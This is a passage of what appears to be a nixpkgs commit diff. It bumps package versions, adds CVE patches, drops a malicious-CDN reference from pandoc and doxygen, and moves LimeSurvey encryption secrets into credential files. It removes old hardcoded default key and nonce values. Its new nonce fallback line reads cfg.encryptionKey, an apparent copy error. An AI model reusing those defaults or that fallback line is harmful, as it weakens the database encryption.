diff options
35 files changed, 289 insertions, 541 deletions
diff --git a/nixos/modules/installer/tools/nix-fallback-paths.nix b/nixos/modules/installer/tools/nix-fallback-paths.nix index e4241e9654036..54d3a107d6276 100644 --- a/nixos/modules/installer/tools/nix-fallback-paths.nix +++ b/nixos/modules/installer/tools/nix-fallback-paths.nix @@ -1,7 +1,7 @@ { - x86_64-linux = "/nix/store/azvn85cras6xv4z5j85fiy406f24r1q0-nix-2.18.1"; - i686-linux = "/nix/store/9bnwy7f9h0kzdzmcnjjsjg0aak5waj40-nix-2.18.1"; - aarch64-linux = "/nix/store/hh65xwqm9s040s3cgn9vzcmrxj0sf5ij-nix-2.18.1"; - x86_64-darwin = "/nix/store/6zi5fqzn9n17wrk8r41rhdw4j7jqqsi3-nix-2.18.1"; - aarch64-darwin = "/nix/store/0pbq6wzr2f1jgpn5212knyxpwmkjgjah-nix-2.18.1"; + x86_64-linux = "/nix/store/1w4b47zhp33md29wjhgg549pc281vv02-nix-2.18.4"; + i686-linux = "/nix/store/hz02kn0ffn3wdi2xs7lndpr88v4v4fp2-nix-2.18.4"; + aarch64-linux = "/nix/store/90zwqa9z2fgldc7ki1p5gfvglchjh9r6-nix-2.18.4"; + x86_64-darwin = "/nix/store/bd1ix5mj9lj2yh7bqnmdjc24zlg5jivk-nix-2.18.4"; + aarch64-darwin = "/nix/store/5hvsmklhqiay5i4q5vdkg60p8qpc69rz-nix-2.18.4"; } diff --git a/nixos/modules/services/web-apps/limesurvey.nix b/nixos/modules/services/web-apps/limesurvey.nix index 920e6928ef5ce..ac6a1fc2bf8f7 100644 --- a/nixos/modules/services/web-apps/limesurvey.nix +++ b/nixos/modules/services/web-apps/limesurvey.nix @@ -20,7 +20,15 @@ let limesurveyConfig = pkgs.writeText "config.php" '' <?php - return json_decode('${builtins.toJSON cfg.config}', true); + return \array_merge( + \json_decode('${builtins.toJSON cfg.config}', true), + [ + 'config' => [ + 'encryptionnonce' => \trim(\file_get_contents(\getenv('CREDENTIALS_DIRECTORY') . DIRECTORY_SEPARATOR . 'encryption_nonce')), + 'encryptionsecretboxkey' => \trim(\file_get_contents(\getenv('CREDENTIALS_DIRECTORY') . DIRECTORY_SEPARATOR . 'encryption_key')), + ] + ] + ); ?> ''; @@ -35,8 +43,9 @@ in enable = mkEnableOption (lib.mdDoc "Limesurvey web application"); encryptionKey = mkOption { - type = types.str; - default = "E17687FC77CEE247F0E22BB3ECF27FDE8BEC310A892347EC13013ABA11AA7EB5"; + type = types.nullOr types.str; + default = null; + visible = false; description = lib.mdDoc '' This is a 32-byte key used to encrypt variables in the database. You _must_ change this from the default value. @@ -44,14 +53,35 @@ in }; encryptionNonce = mkOption { - type = types.str; - default = "1ACC8555619929DB91310BE848025A427B0F364A884FFA77"; + type = types.nullOr types.str; + default = null; + visible = false; description = lib.mdDoc '' This is a 24-byte nonce used to encrypt variables in the database. You _must_ change this from the default value. ''; }; + encryptionKeyFile = mkOption { + type = types.nullOr types.path; + default = null; + description = lib.mdDoc '' + 32-byte key used to encrypt variables in the database. + + Note: It should be string not a store path in order to prevent the password from being world readable + ''; + }; + + encryptionNonceFile = mkOption { + type = types.nullOr types.path; + default = null; + description = lib.mdDoc '' + 24-byte used to encrypt variables in the database. + + Note: It should be string not a store path in order to prevent the password from being world readable + ''; + }; + database = { type = mkOption { type = types.enum [ "mysql" "pgsql" "odbc" "mssql" ]; @@ -183,6 +213,22 @@ in { assertion = cfg.database.createLocally -> cfg.database.passwordFile == null; message = "a password cannot be specified if services.limesurvey.database.createLocally is set to true"; } + { assertion = cfg.encryptionKey != null || cfg.encryptionKeyFile != null; + message = '' + You must set `services.limesurvey.encryptionKeyFile` to a file containing a 32-character uppercase hex string. + + If this message appears when updating your system, please turn off encryption + in the LimeSurvey interface and create backups before filling the key. + ''; + } + { assertion = cfg.encryptionNonce != null || cfg.encryptionNonceFile != null; + message = '' + You must set `services.limesurvey.encryptionNonceFile` to a file containing a 24-character uppercase hex string. + + If this message appears when updating your system, please turn off encryption + in the LimeSurvey interface and create backups before filling the nonce. + ''; + } ]; services.limesurvey.config = mapAttrs (name: mkDefault) { @@ -204,8 +250,6 @@ in config = { tempdir = "${stateDir}/tmp"; uploaddir = "${stateDir}/upload"; - encryptionnonce = cfg.encryptionNonce; - encryptionsecretboxkey = cfg.encryptionKey; force_ssl = mkIf (cfg.virtualHost.addSSL || cfg.virtualHost.forceSSL || cfg.virtualHost.onlySSL) "on"; config.defaultlang = "en"; }; @@ -229,11 +273,26 @@ in phpPackage = pkgs.php81; phpEnv.DBENGINE = "${cfg.database.dbEngine}"; phpEnv.LIMESURVEY_CONFIG = "${limesurveyConfig}"; + # App code cannot access credentials directly since the service starts + # with the root user so we copy the credentials to a place accessible to Limesurvey + phpEnv.CREDENTIALS_DIRECTORY = "${stateDir}/credentials"; settings = { "listen.owner" = config.services.httpd.user; "listen.group" = config.services.httpd.group; } // cfg.poolConfig; }; + systemd.services.phpfpm-limesurvey.serviceConfig = { + ExecStartPre = pkgs.writeShellScript "limesurvey-phpfpm-exec-pre" '' + cp -f "''${CREDENTIALS_DIRECTORY}"/encryption_key "${stateDir}/credentials/encryption_key" + chown ${user}:${group} "${stateDir}/credentials/encryption_key" + cp -f "''${CREDENTIALS_DIRECTORY}"/encryption_nonce "${stateDir}/credentials/encryption_nonce" + chown ${user}:${group} "${stateDir}/credentials/encryption_nonce" + ''; + LoadCredential = [ + "encryption_key:${if cfg.encryptionKeyFile != null then cfg.encryptionKeyFile else pkgs.writeText "key" cfg.encryptionKey}" + "encryption_nonce:${if cfg.encryptionNonceFile != null then cfg.encryptionNonceFile else pkgs.writeText "nonce" cfg.encryptionKey}" + ]; + }; services.httpd = { enable = true; @@ -277,6 +336,7 @@ in "d ${stateDir}/tmp/assets 0750 ${user} ${group} - -" "d ${stateDir}/tmp/runtime 0750 ${user} ${group} - -" "d ${stateDir}/tmp/upload 0750 ${user} ${group} - -" + "d ${stateDir}/credentials 0700 ${user} ${group} - -" "C ${stateDir}/upload 0750 ${user} ${group} - ${pkg}/share/limesurvey/upload" ]; @@ -295,6 +355,10 @@ in User = user; Group = group; Type = "oneshot"; + LoadCredential = [ + "encryption_key:${if cfg.encryptionKeyFile != null then cfg.encryptionKeyFile else pkgs.writeText "key" cfg.encryptionKey}" + "encryption_nonce:${if cfg.encryptionNonceFile != null then cfg.encryptionNonceFile else pkgs.writeText "nonce" cfg.encryptionKey}" + ]; }; }; diff --git a/nixos/tests/limesurvey.nix b/nixos/tests/limesurvey.nix index 9a3193991f352..87e9fe1cdc149 100644 --- a/nixos/tests/limesurvey.nix +++ b/nixos/tests/limesurvey.nix @@ -1,6 +1,6 @@ -import ./make-test-python.nix ({ pkgs, ... }: { +import ./make-test-python.nix ({ lib, pkgs, ... }: { name = "limesurvey"; - meta.maintainers = [ pkgs.lib.maintainers.aanderse ]; + meta.maintainers = [ lib.maintainers.aanderse ]; nodes.machine = { ... }: { services.limesurvey = { @@ -9,6 +9,8 @@ import ./make-test-python.nix ({ pkgs, ... }: { hostName = "example.local"; adminAddr = "root@example.local"; }; + encryptionKeyFile = pkgs.writeText "key" (lib.strings.replicate 32 "0"); + encryptionNonceFile = pkgs.writeText "nonce" (lib.strings.replicate 24 "0"); }; # limesurvey won't work without a dot in the hostname diff --git a/pkgs/applications/networking/browsers/chromium/upstream-info.nix b/pkgs/applications/networking/browsers/chromium/upstream-info.nix index 54d4e2417f695..7a6ad1abca4d4 100644 --- a/pkgs/applications/networking/browsers/chromium/upstream-info.nix +++ b/pkgs/applications/networking/browsers/chromium/upstream-info.nix @@ -27,11 +27,11 @@ version = "2024-05-13"; }; ungoogled-patches = { - hash = "sha256-lj/XYWkEo7M1i3D5e1MVXTXh02U55lNoo+sxKpu8FNc="; - rev = "126.0.6478.114-1"; + hash = "sha256-DLxtXcm4gPVzBeGxjD4harmdQWoH8LKn6GBlhtq/MVM="; + rev = "126.0.6478.126-1"; }; }; - hash = "sha256-sXP+/KXDoy3QnRoa9acGbsXKVCPspyNGtZTLMHBqxvw="; - version = "126.0.6478.114"; + hash = "sha256-Z0QeUG4ykNqdlxXYgLteJQ0jS8apC5kwW5hwlUnhod0="; + version = "126.0.6478.126"; }; } diff --git a/pkgs/applications/networking/instant-messengers/discord/default.nix b/pkgs/applications/networking/instant-messengers/discord/default.nix index d5496c104c001..7d77818578012 100644 --- a/pkgs/applications/networking/instant-messengers/discord/default.nix +++ b/pkgs/applications/networking/instant-messengers/discord/default.nix @@ -2,52 +2,52 @@ let versions = if stdenv.isLinux then { - stable = "0.0.56"; - ptb = "0.0.90"; - canary = "0.0.422"; - development = "0.0.19"; + stable = "0.0.58"; + ptb = "0.0.92"; + canary = "0.0.438"; + development = "0.0.21"; } else { - stable = "0.0.307"; - ptb = "0.0.119"; - canary = "0.0.531"; - development = "0.0.41"; + stable = "0.0.309"; + ptb = "0.0.121"; + canary = "0.0.547"; + development = "0.0.43"; }; version = versions.${branch}; srcs = rec { x86_64-linux = { stable = fetchurl { url = "https://dl.discordapp.net/apps/linux/${version}/discord-${version}.tar.gz"; - hash = "sha256-HpdsvzWtB4AoqZXf7LV0J50/OQDsYgK8bkQ1HGvu7Ec="; + hash = "sha256-YkyniFgkD4GMxUya+/Ke5fxosZKHKyc4+cAx3HI4w8c="; }; ptb = fetchurl { url = "https://dl-ptb.discordapp.net/apps/linux/${version}/discord-ptb-${version}.tar.gz"; - hash = "sha256-75YnLhgNTd7pwpTE9qSIF0rzBwmGJ/CYa+YgN3OQZ2w="; + hash = "sha256-1HbTRWl1w9cu7D4NNFGVbHk1hvRmMywH+q2qA4+nokc="; }; canary = fetchurl { url = "https://dl-canary.discordapp.net/apps/linux/${version}/discord-canary-${version}.tar.gz"; - hash = "sha256-MTC079WTN0Vw57aLro1WkHRL09IKYjnUsfBAMiiHjI0="; + hash = "sha256-z2SsI1vmaW1HjBDkJEH468xPuyAqigOIbRDtaL4Lgxc="; }; development = fetchurl { url = "https://dl-development.discordapp.net/apps/linux/${version}/discord-development-${version}.tar.gz"; - hash = "sha256-RP6SUM4DW3JhddSbJX6Xg8EE4iqCkSOgBL1oa7Zwp/E="; + hash = "sha256-LgRrQ2z0/mx9Xvkb7hOrhmOqaETiBITgJDO9vce/wtk="; }; }; x86_64-darwin = { stable = fetchurl { url = "https://dl.discordapp.net/apps/osx/${version}/Discord.dmg"; - hash = "sha256-FBYxQhtwctMQ8ByOgAVncWh5297k1Vh95w/rWnZg9Fw="; + hash = "sha256-9Tfn+dxvhgNjSdfj8Irb/5VU3kn39DX6hdKkppJ6HeU="; }; ptb = fetchurl { url = "https://dl-ptb.discordapp.net/apps/osx/${version}/DiscordPTB.dmg"; - hash = "sha256-Y5t6ndecfRf3zVfYEvFGiFinQxRSa7VyfnkAors8VPY="; + hash = "sha256-3Lk+kPZcBqznIELVMdA6dRpCOaOuRrchmfHv/EAyyOQ="; }; canary = fetchurl { url = "https://dl-canary.discordapp.net/apps/osx/${version}/DiscordCanary.dmg"; - hash = "sha256-eMJ/OKi+k92QEk140UW3RIi5G/UFlR6mW9f8kPZbFaw="; + hash = "sha256-ec2XF3023bQn/85i1xO8tTuYuprtsaL9exqRiZam36A="; }; development = fetchurl { url = "https://dl-development.discordapp.net/apps/osx/${version}/DiscordDevelopment.dmg"; - hash = "sha256-RiGyca/zjPpENgcq9KnRh5G4YArrUOQeueUdUBgZgjo="; + hash = "sha256-PZS7LHJExi+fb7G4CnIFk4KQx9/cL4ALXwzOcLx4sWU="; }; }; aarch64-darwin = x86_64-darwin; diff --git a/pkgs/applications/version-management/gitlab/data.json b/pkgs/applications/version-management/gitlab/data.json index 382038ac99a5b..41fe2756ff47e 100644 --- a/pkgs/applications/version-management/gitlab/data.json +++ b/pkgs/applications/version-management/gitlab/data.json @@ -1,15 +1,15 @@ { - "version": "16.11.4", - "repo_hash": "sha256-VtjGV/0Xtmwqu/YZa6P6jUvlTYj9FNKALcJ3ZvMUJBw=", + "version": "16.11.5", + "repo_hash": "1bhg6glb644m55m50q2kp0azf3c4if11vymjn823rhs68jw3jqcp", "yarn_hash": "03q7h8dyssvsr91klr1jk65f5jz1ac71lx0114zq9c7awxrgp6kq", "owner": "gitlab-org", "repo": "gitlab", - "rev": "v16.11.4-ee", + "rev": "v16.11.5-ee", "passthru": { - "GITALY_SERVER_VERSION": "16.11.4", - "GITLAB_PAGES_VERSION": "16.11.4", + "GITALY_SERVER_VERSION": "16.11.5", + "GITLAB_PAGES_VERSION": "16.11.5", "GITLAB_SHELL_VERSION": "14.35.0", "GITLAB_ELASTICSEARCH_INDEXER_VERSION": "4.8.0", - "GITLAB_WORKHORSE_VERSION": "16.11.4" + "GITLAB_WORKHORSE_VERSION": "16.11.5" } } diff --git a/pkgs/applications/version-management/gitlab/gitaly/default.nix b/pkgs/applications/version-management/gitlab/gitaly/default.nix index 78f64f07b2cb4..b9c67b96d80c0 100644 --- a/pkgs/applications/version-management/gitlab/gitaly/default.nix +++ b/pkgs/applications/version-management/gitlab/gitaly/default.nix @@ -6,7 +6,7 @@ }: let - version = "16.11.4"; + version = "16.11.5"; package_version = "v${lib.versions.major version}"; gitaly_package = "gitlab.com/gitlab-org/gitaly/${package_version}"; @@ -18,7 +18,7 @@ let owner = "gitlab-org"; repo = "gitaly"; rev = "v${version}"; - hash = "sha256-sdRKKOWoX0yyqUGpu/mqDdTq2nLZ2Gr5GNV9x99rdeU="; + hash = "sha256-iBLRhkFPsopy6m3y+9Qc+v3FCbV5nOWMs+DMwW+JiSk="; }; vendorHash = "sha256-WCZF7XVW6J1zyPx8e/Mcn+HmHElAUGcEICxiF5HLzBg="; diff --git a/pkgs/applications/version-management/gitlab/gitlab-pages/default.nix b/pkgs/applications/version-management/gitlab/gitlab-pages/default.nix index 38362f1fc63a2..68b3bdb5ee7b3 100644 --- a/pkgs/applications/version-management/gitlab/gitlab-pages/default.nix +++ b/pkgs/applications/version-management/gitlab/gitlab-pages/default.nix @@ -2,14 +2,14 @@ buildGoModule rec { pname = "gitlab-pages"; - version = "16.11.4"; + version = "16.11.5"; # nixpkgs-update: no auto update src = fetchFromGitLab { owner = "gitlab-org"; repo = "gitlab-pages"; rev = "v${version}"; - hash = "sha256-6Fh1IKCs2Bg7Eg44kbCMM8YhLmwWvdZnXp39fphLzcE="; + hash = "sha256-mJKzaFICE7f4aIFGeV/4PbbQkaxwmRd9QO2pRXpM2ag="; }; vendorHash = "sha256-WrR4eZRAuYkhr7ZqP7OXqJ6uwvxzn+t+3OdBNcNaq0M="; diff --git a/pkgs/applications/version-management/gitlab/gitlab-workhorse/default.nix b/pkgs/applications/version-management/gitlab/gitlab-workhorse/default.nix index d01deb57b2006..682376e40a111 100644 --- a/pkgs/applications/version-management/gitlab/gitlab-workhorse/default.nix +++ b/pkgs/applications/version-management/gitlab/gitlab-workhorse/default.nix @@ -5,7 +5,7 @@ in buildGoModule rec { pname = "gitlab-workhorse"; - version = "16.11.4"; + version = "16.11.5"; # nixpkgs-update: no auto update src = fetchFromGitLab { diff --git a/pkgs/applications/virtualization/singularity/packages.nix b/pkgs/applications/virtualization/singularity/packages.nix index 80e7d2c2a39f4..4552cc979648a 100644 --- a/pkgs/applications/virtualization/singularity/packages.nix +++ b/pkgs/applications/virtualization/singularity/packages.nix @@ -7,20 +7,20 @@ let apptainer = callPackage (import ./generic.nix rec { pname = "apptainer"; - version = "1.2.5"; + version = "1.3.2"; projectName = "apptainer"; src = fetchFromGitHub { owner = "apptainer"; repo = "apptainer"; rev = "refs/tags/v${version}"; - hash = "sha256-1XuqyNXyYrmIfqp8450z8+qET15hKVfj2v2iN9QPmDk="; + hash = "sha256-NseigaPmRKDsBk8v7RpYf+uoEGvQHVnqOMO49kP0mQ8="; }; # Update by running # nix-prefetch -E "{ sha256 }: ((import ./. { }).apptainer.override { vendorHash = sha256; }).goModules" # at the root directory of the Nixpkgs repository - vendorHash = "sha256-Y0gOqg+WGgssXGEYHc9IFwiIpkb3hetlQI89vseAQPc="; + vendorHash = "sha256-W853++SSvkAYYUczbl8vnoBQZnimUdsAEXp4MCkLPBU="; extraDescription = " (previously known as Singularity)"; extraMeta.homepage = "https://apptainer.org"; diff --git a/pkgs/build-support/setup-hooks/strip.sh b/pkgs/build-support/setup-hooks/strip.sh index ce41e6ea0562a..49a350af1fa5c 100644 --- a/pkgs/build-support/setup-hooks/strip.sh +++ b/pkgs/build-support/setup-hooks/strip.sh @@ -74,13 +74,17 @@ stripDirs() { echo "stripping (with command $cmd and flags $stripFlags) in $paths" local striperr striperr="$(mktemp --tmpdir="$TMPDIR" 'striperr.XXXXXX')" - # Do not strip lib/debug. This is a directory used by setup-hooks/separate-debug-info.sh. - find $paths -type f "${excludeFlags[@]}" -a '!' -path "$prefix/lib/debug/*" -print0 | - # Make sure we process files under symlinks only once. Otherwise - # 'strip` can corrupt files when writes to them in parallel: - # https://github.com/NixOS/nixpkgs/issues/246147#issuecomment-1657072039 - xargs -r -0 -n1 -- realpath -z | sort -u -z | + # Make sure we process files only once. `strip`ping the same file through different + # links in parallel can corrupt it: + # https://github.com/NixOS/nixpkgs/issues/246147#issuecomment-1657072039 + # Do not strip lib/debug. This is a directory used by setup-hooks/separate-debug-info.sh. + # Print out each file's device and inode (which will be the same if two files are hardlinked + # or are the same file found through different symlinks), followed by its path... + find $paths -type f "${excludeFlags[@]}" -a '!' -path "$prefix/lib/debug/*" -printf '%D-%i,%p\0' | + # ... sort/uniq by device/inode, then cut them out and keep the path, ... + sort -t, -k1,1 -u -z | cut -d, -f2- -z | + # and finally strip each unique path in parallel. xargs -r -0 -n1 -P "$NIX_BUILD_CORES" -- $cmd $stripFlags 2>"$striperr" || exit_code=$? # xargs exits with status code 123 if some but not all of the # processes fail. We don't care if some of the files couldn't diff --git a/pkgs/by-name/go/google-chrome/package.nix b/pkgs/by-name/go/google-chrome/package.nix index 1a7cfc71075fb..a5a1ad6e24114 100644 --- a/pkgs/by-name/go/google-chrome/package.nix +++ b/pkgs/by-name/go/google-chrome/package.nix @@ -64,11 +64,11 @@ let in stdenv.mkDerivation (finalAttrs: { pname = "google-chrome"; - version = "126.0.6478.114"; + version = "126.0.6478.126"; src = fetchurl { url = "https://dl.google.com/linux/chrome/deb/pool/main/g/google-chrome-stable/google-chrome-stable_${finalAttrs.version}-1_amd64.deb"; - hash = "sha256-CGqo6XnUwndOjODOxy+TCGxDXbAz4EwkZMOl7ZLFsAc="; + hash = "sha256-PsHK27Vc9mzFHwQh6s4ySoiDbuLZgrlFuPZ6PxMbCSQ="; }; nativeBuildInputs = [ patchelf makeWrapper ]; diff --git a/pkgs/data/misc/cacert/default.nix b/pkgs/data/misc/cacert/default.nix index 4b103f7f32898..517e1d87273b5 100644 --- a/pkgs/data/misc/cacert/default.nix +++ b/pkgs/data/misc/cacert/default.nix @@ -20,7 +20,7 @@ let blocklist = writeText "cacert-blocklist.txt" (lib.concatStringsSep "\n" blacklist); extraCertificatesBundle = writeText "cacert-extra-certificates-bundle.crt" (lib.concatStringsSep "\n\n" extraCertificateStrings); - srcVersion = "3.98"; + srcVersion = "3.101"; version = if nssOverride != null then nssOverride.version else srcVersion; meta = with lib; { homepage = "https://curl.haxx.se/docs/caextract.html"; @@ -37,7 +37,7 @@ let owner = "nss-dev"; repo = "nss"; rev = "NSS_${lib.replaceStrings ["."] ["_"] version}_RTM"; - hash = "sha256-0p1HzspxyzhzX46O7ax8tmYiaFEBeqEqEvman4NIiQc="; + hash = "sha256-lO+81zYBBFwqcjh4cd/fpiznHZ9rTJpfDW/yF8phYts="; }; dontBuild = true; diff --git a/pkgs/development/compilers/go/1.21.nix b/pkgs/development/compilers/go/1.21.nix index 55ce65ba1a7c5..38a169758ab6f 100644 --- a/pkgs/development/compilers/go/1.21.nix +++ b/pkgs/development/compilers/go/1.21.nix @@ -46,11 +46,11 @@ let in stdenv.mkDerivation (finalAttrs: { pname = "go"; - version = "1.21.10"; + version = "1.21.11"; src = fetchurl { url = "https://go.dev/dl/go${finalAttrs.version}.src.tar.gz"; - hash = "sha256-kA4K/okAwe5lqKjE8MWjygLc+FwdHLE6ZSviLCE5k5Q="; + hash = "sha256-Qq7pvytpVsdaetaqPwpRtYIf/qxX9aLnM6LW6uHm2dI="; }; strictDeps = true; diff --git a/pkgs/development/haskell-modules/configuration-common.nix b/pkgs/development/haskell-modules/configuration-common.nix index 6cc22008ab8b5..2ef46e1200bfe 100644 --- a/pkgs/development/haskell-modules/configuration-common.nix +++ b/pkgs/development/haskell-modules/configuration-common.nix @@ -1894,7 +1894,13 @@ self: super: { install -Dm 555 '${self.pandoc}'/share/man/man1/* -t "$out"/share/man/man1/ '' + (old.postInstall or ""); }) (super.pandoc-cli.overrideScope pandoc-cli-overlay); - pandoc_3_1_9 = doDistribute (super.pandoc_3_1_9.overrideScope pandoc-cli-overlay); + pandoc_3_1_9 = appendPatches [ + (fetchpatch { + name = "drop-usage-known-bad-actor-cdn.patch"; + url = "https://github.com/jgm/pandoc/commit/5877ec546df29115163b36de32837f5e08506092.patch"; + hash = "sha256-2ffdL2dS/hHWBjJcIHbae5OdL/VKlHNKUMDHRy3hqvc="; + }) + ] (doDistribute (super.pandoc_3_1_9.overrideScope pandoc-cli-overlay)); pandoc-lua-engine = super.pandoc-lua-engine.overrideScope pandoc-cli-overlay; }) pandoc-cli diff --git a/pkgs/development/libraries/libndp/default.nix b/pkgs/development/libraries/libndp/default.nix index 6109c48b036e0..0a8984dc90aac 100644 --- a/pkgs/development/libraries/libndp/default.nix +++ b/pkgs/development/libraries/libndp/default.nix @@ -1,4 +1,4 @@ -{ lib, stdenv, fetchurl, autoreconfHook }: +{ lib, stdenv, fetchurl, fetchpatch, autoreconfHook }: stdenv.mkDerivation rec { pname = "libndp"; @@ -9,6 +9,15 @@ stdenv.mkDerivation rec { sha256 = "sha256-iP+2buLrUn8Ub1wC9cy8OLqX0rDVfrRr+6SIghqwwCs="; }; + patches = [ + (fetchpatch { + # https://github.com/jpirko/libndp/issues/26 + name = "CVE-2024-5564.patch"; + url = "https://github.com/jpirko/libndp/commit/05e4ba7b0d126eea4c04387dcf40596059ee24af.patch"; + hash = "sha256-O7AHjCqic7iUfMbKYLGgBAU+wdR9/MDWxBWJw+CFn/c="; + }) + ]; + nativeBuildInputs = [ autoreconfHook ]; meta = with lib; { diff --git a/pkgs/development/libraries/openssl/default.nix b/pkgs/development/libraries/openssl/default.nix index 2c4c8dd562b84..32d02767705af 100644 --- a/pkgs/development/libraries/openssl/default.nix +++ b/pkgs/development/libraries/openssl/default.nix @@ -257,8 +257,8 @@ in { }; openssl_3 = common { - version = "3.0.13"; - hash = "sha256-iFJXU/edO+wn0vp8ZqoLkrOqlJja/ZPXz6SzeAza4xM="; + version = "3.0.14"; + hash = "sha256-7soDXU3U6E/CWEbZUtpil0hK+gZQpvhMaC453zpBI8o="; patches = [ ./3.0/nix-ssl-cert-file.patch @@ -280,8 +280,8 @@ in { }; openssl_3_1 = common { - version = "3.1.5"; - hash = "sha256-auAVRn2r8EabE5rakzGTJ74kuYJR/67O2gIhhI3AkmI="; + version = "3.1.6"; + hash = "sha256-XSvkA2tHjvPLCoVMqbNTByw6DibYpW+PCrn7btMtONc="; patches = [ ./3.0/nix-ssl-cert-file.patch diff --git a/pkgs/development/python-modules/torch/default.nix b/pkgs/development/python-modules/torch/default.nix index 70b71c8cdf880..36b1ada5ae30d 100644 --- a/pkgs/development/python-modules/torch/default.nix +++ b/pkgs/development/python-modules/torch/default.nix @@ -145,7 +145,23 @@ in buildPythonPackage rec { hash = "sha256-xUj77yKz3IQ3gd/G32pI4OhL3LoN1zS7eFg0/0nZp5I="; }; - patches = lib.optionals (stdenv.isDarwin && stdenv.isx86_64) [ + patches = [ + (fetchpatch { + name = "CVE-2024-31580.patch"; + url = "https://github.com/pytorch/pytorch/commit/b5c3a17c2c207ebefcb85043f0cf94be9b2fef81.patch"; + hash = "sha256-UR9PesE+t7ekVh4cJlrCgFULLFgqZjWhgr3jFP+vuEQ="; + }) + (fetchpatch { + name = "CVE-2024-31583.patch"; + url = "https://github.com/pytorch/pytorch/commit/9c7071b0e324f9fb68ab881283d6b8d388a4bcd2.patch"; + hash = "sha256-TtiB9d8VQ5dXXOHyq4N45uFW5csmxHsF6naPH4IrKlc="; + }) + (fetchpatch { + name = "CVE-2024-31584.patch"; + url = "https://github.com/pytorch/pytorch/commit/7c35874ad664e74c8e4252d67521f3986eadb0e6.patch"; + hash = "sha256-4IsdRfL0B+Rown4xqra8taqqOXf8NKCtSN9sPrOPQV8="; + }) + ] ++ lib.optionals (stdenv.isDarwin && stdenv.isx86_64) [ # pthreadpool added support for Grand Central Dispatch in April # 2020. However, this relies on functionality (DISPATCH_APPLY_AUTO) # that is available starting with macOS 10.13. However, our current diff --git a/pkgs/development/tools/documentation/doxygen/default.nix b/pkgs/development/tools/documentation/doxygen/default.nix index d735637cb53d3..5b026cda2cfc4 100644 --- a/pkgs/development/tools/documentation/doxygen/default.nix +++ b/pkgs/development/tools/documentation/doxygen/default.nix @@ -2,6 +2,7 @@ , stdenv , cmake , fetchFromGitHub +, fetchpatch , python3 , flex , bison @@ -22,6 +23,14 @@ stdenv.mkDerivation rec { sha256 = "sha256-ezeMQk+Vyi9qNsYwbaRRruaIYGY8stFf71W7GonXqco="; }; + patches = [ + (fetchpatch { + name = "drop-usage-bad-actor-polyfill.io.patch"; + url = "https://github.com/doxygen/doxygen/commit/41e3eeed6d7c34d14f072cbfea5fe418fc65a760.patch"; + hash = "sha256-vtuVO6v2Hccm2W+Ilv3a2kmBMrRyYLCYVWLyZKx0s7s="; + }) + ]; + nativeBuildInputs = [ cmake python3 diff --git a/pkgs/misc/ghostscript/default.nix b/pkgs/misc/ghostscript/default.nix index daf7758b11843..a561dbfe53103 100644 --- a/pkgs/misc/ghostscript/default.nix +++ b/pkgs/misc/ghostscript/default.nix @@ -2,6 +2,7 @@ , stdenv , lib , fetchurl +, fetchpatch , pkg-config , zlib , expat @@ -71,6 +72,26 @@ stdenv.mkDerivation rec { patches = [ ./urw-font-files.patch ./doc-no-ref.diff + (fetchpatch { + name = "CVE-2024-33870.patch"; + url = "https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/patch/?id=79aef19c685984dc3da2dc090450407d9fbcff80"; + hash = "sha256-EZOtKbAkNujqAPoD1yWTggXYTdLPPR9uC898JByQwVs="; + }) + (fetchpatch { + name = "CVE-2024-33869.part-1.patch"; + url = "https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/patch/?id=5ae2e320d69a7d0973011796bd388cd5befa1a43"; + hash = "sha256-ob2c4aawUxJcsLdhHX9/7CDNnnxO8k1LTqfar5Bgdo8="; + }) + (fetchpatch { + name = "CVE-2024-33869.part-2.patch"; + url = "https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/patch/?id=f5336e5b4154f515ac83bc5b9eba94302e6618d4"; + hash = "sha256-2Kx57WJvALpEjR8+uTbF3CBvO/9Ujl652L4Kf+mNRWo="; + }) + (fetchpatch { + name = "CVE-2024-33871.patch"; + url = "https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/patch/?id=7145885041bb52cc23964f0aa2aec1b1c82b5908"; + hash = "sha256-a5+WY63lmu++cc8BGREWlIY4S1LEvWqeqTTfBnEY+YM="; + }) ]; outputs = [ "out" "man" "doc" ]; diff --git a/pkgs/os-specific/linux/freeipa/default.nix b/pkgs/os-specific/linux/freeipa/default.nix index e94f6370da984..16cffb1de5a70 100644 --- a/pkgs/os-specific/linux/freeipa/default.nix +++ b/pkgs/os-specific/linux/freeipa/default.nix @@ -64,11 +64,11 @@ let in stdenv.mkDerivation rec { pname = "freeipa"; - version = "4.11.1"; + version = "4.11.2"; src = fetchurl { url = "https://releases.pagure.org/freeipa/freeipa-${version}.tar.gz"; - sha256 = "sha256-Ubq2xAqBvjUwrzD2R6tB0i1WsdA0Y0jnJLgi4p4r8D4="; + hash = "sha256-qrMdseQMTX82qKQldIlbYuhkPqGigULbKdZDYVVBWpQ="; }; nativeBuildInputs = [ diff --git a/pkgs/os-specific/linux/kernel/kernels-org.json b/pkgs/os-specific/linux/kernel/kernels-org.json index 035d7de0536bb..9585ae305c175 100644 --- a/pkgs/os-specific/linux/kernel/kernels-org.json +++ b/pkgs/os-specific/linux/kernel/kernels-org.json @@ -1,15 +1,15 @@ { "testing": { - "version": "6.10-rc1", - "hash": "sha256:006frl76cwi9a4mw7x6vsyazgrjfiz1gn4q4hvpykqql5mar3a05" + "version": "6.10-rc5", + "hash": "sha256:1bjqcgik4mgjshwy7p45msd62rmq8wjyz7b60n4fsm3kyk16imcd" }, "6.5": { "version": "6.5.13", "hash": "sha256:1dfbbydmayfj9npx3z0g38p574pmcx3qgs49dv0npigl48wd9yvq" }, "6.1": { - "version": "6.1.95", - "hash": "sha256:1gfz2j6iixbr0dfkb8jkwnb4gicrm5rc5lsa24wmyrkm3nmg0q19" + "version": "6.1.96", + "hash": "sha256:1ab290vm6h8vj1qi1qhxzh9kc6dbgpkwybcwzw1aprz5kl3cjxry" }, "5.15": { "version": "5.15.161", @@ -28,15 +28,15 @@ "hash": "sha256:0lmyhwr4la7kvim7jqdi29scjkvqp9crpvdbhpb4j8d7mj5kgzz4" }, "6.6": { - "version": "6.6.35", - "hash": "sha256:17nxymy3r9q45cfzc9rqp937m37zr1b8fjn1m0x0dv8jhxrfxqzw" + "version": "6.6.36", + "hash": "sha256:1mfdw2prjb54r19y22sm37q8spnk6lyk162ima7gps1pnwl6hrxr" }, "6.8": { "version": "6.8.12", "hash": 